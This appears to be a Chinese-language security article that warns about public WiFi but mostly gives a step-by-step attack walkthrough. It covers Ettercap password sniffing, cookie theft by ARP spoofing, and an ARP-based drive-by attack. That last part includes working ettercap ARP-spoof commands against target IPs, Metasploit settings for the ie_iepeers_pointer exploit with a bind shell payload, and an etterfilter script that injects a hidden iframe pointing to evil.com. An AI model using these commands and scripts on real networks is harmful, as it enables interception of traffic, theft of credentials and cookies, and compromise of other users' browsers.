安恒信息专家指出：小心使用公共场所的WiFi

随着智能手机和各类终端（如iPAD）的普及，越来越多的用户喜欢使用它们进行网上冲浪、网上购物、手机网银操作等。这些设备都提供了WiFi接入的功能，目前在很多公共场所都提供了免费的Wifi的热点，所以很多用户都会使用这些免费的WiFi进行上网操作。随着WiFi的普及，打WiFi主意的黑客也逐渐多了起来。下面我就分析一下他们的做法：

一、密码嗅探

1、使用Ettercap嗅探工具

2、选择用于嗅探数据包的网络接口

3、探测局域网内的主机列表

4、添加嗅探目标，并开始执行嗅探

5、这时如果源和目标主机进行了数据通信，且涉及到了疑是用户名密码等数据，捕获的信息将会显示

6、即使使用SSL的也同样可以被嗅探到

7、其它可以嗅探的口令信息：TELNET、FTP、POP、RLOGIN、SSH1、ICQ、SMB、MySQL、HTTP、NNTP、 X11、NAPSTER、IRC、RIP、BGP、SOCK5、IMAP4、VNC、LDAP、NFS、SNMP、HALFLIFE、QUAKE3、 MSNYMSG。

二、盗取cookie

同样使用Ettercap，然后使用arp欺骗实现：

三、arp挂马

利用ARP 欺骗把数据流都引到本地，然后替换成我们事先准备好的挂马代码，再转发出去。

• ettercap -T -q -F ieexpft -M arp:remote /192.168.1.105/ //
• 表示对192.168.1.105主机进行arp欺骗
• 启动Msf的使用

• use exploit/windows/browser/ie_iepeers_pointer

• set SRVHOST 192.168.1.103(攻击者ip)
• Msf会自动为我们开启类似服务
• 其他默认就可下面指定payload使用这个set PAYLOAD window/shell/bind_tcp
• Payload的选项保持默认就行默认绑定4444端口
• 目标：0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

• 下面看一下ettercap的过滤脚本马上开始
• ettercap使用的过滤脚本

If(ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data,"Accept-Encoding")) {
replace("Accept-Encoding","Accept-Mousecat");
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<body>") ){
replace("<body>","<body> <iframe src=\"http://evil.com/evil.html\"width=0 height=0 >");
msg("Filter Run...&&Exploit Code Injected OK!\n");
}
}

• 过滤脚本的功能
• 第一个if语句块，功能是如果ip协议匹配TCP，并且目标端口是80的话(一般是说浏览器浏览网页时候，对网站80端口发送请求)，则搜索HTTP 数据流的Accept-ncoding，并且替换为Accept-Mousecat，然后在控制台打印一条“zappedAccept-Encoding”的消息，目的是为了避免目标客户端浏览器像启用了GZIP 这样的数据压缩功能。
• 第二个if 语句块，如果ip 协议匹配TCP,并且源端口是80的话，则搜索<body>关键字，
  并且替换为<body> <iframe src=“http://evil.com/evil.html” width=0 height=0 >的代码，修改下脚本
• 我们的网马地址类似于http://192.168.1.103:8080/ZtfaWRsEf0

• 网马的地址是msf生成的。现在我们就开始生成网马（姑且这么叫）

• 最后编译一下脚本etterfilter -o ieexpft ieexp.filter

• 下面启动ettercap
• 进行arp欺骗并挂马
• 我们对192.168.1.106进行arp欺骗
• 命令前面讲过了：

ettercap -T -q -F ieexpft -M arp:remote /192.168.1.106/ //
已经启动了~~~我们现在随便打开一个网页看看
已经注入了我们的挂马代码~~~